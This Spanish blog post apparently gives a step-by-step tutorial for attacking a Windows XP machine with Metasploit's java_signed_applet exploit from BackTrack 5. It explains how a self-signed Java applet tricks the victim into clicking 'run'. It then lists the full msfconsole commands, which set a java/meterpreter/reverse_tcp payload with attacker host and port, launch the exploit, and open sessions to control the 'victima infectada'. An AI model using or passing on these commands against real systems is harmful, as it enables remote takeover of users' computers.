miércoles, 24 de octubre de 2012

BackTrack 5 Exploit java_signed_applet


Exploit java_signed_applet BackTrack 5



Este exploit crea dinámicamente un archivo. Jar a través de la Msf :: Exploit :: Java mixin, luego firma el mismo. El applet firmado resultante se presenta a la víctima a través de una página web con una etiqueta de applet. JVM de la víctima se abrirá un cuadro de diálogo preguntando si confían en el applet firmado. En las versiones anteriores del cuadro de diálogo mostrará el valor de CERTCN en el "Publisher" de línea. Entrada más reciente JVM pantalla "desconocido" cuando la firma no es de confianza (es decir, no está firmado por una CA de confianza). La opción SigningCert le permite proporcionar un código de confianza cert firma, los valores en que anularán CERTCN. Si SigningCert no se da, un número generado aleatoriamente autofirmado cert se utilizará. De cualquier manera, una vez que el usuario hace clic en "run", el applet se ejecuta con permisos de usuario.


Mas info: http://adf.ly/Dp3Ks


El siguiente ejemplo esta basado en un atacando con sistema operativo backtrack y una victima con Windows xp.

Iniciamos una terminal y ejecutamos msf:






ejecutamos los siguientes comando de configuración:



use exploit/multi/browser/java_signed_applet
set payload java/meterpreter/reverse_tcp
set lhost TU IP
set target IP VICTIMA 0 CUALQUIER IP
set uripath /
set svport 8080
set lport 4444
exploit


VICTIMA:
La victima ejecuta la siguiente URL:





Navegador:










ATACANTE:
Una vez que la victima ingresa al sitio web , el atacante podrá tener el control de la victima:



sessions -l 





sessions -i 1



Victima infectada: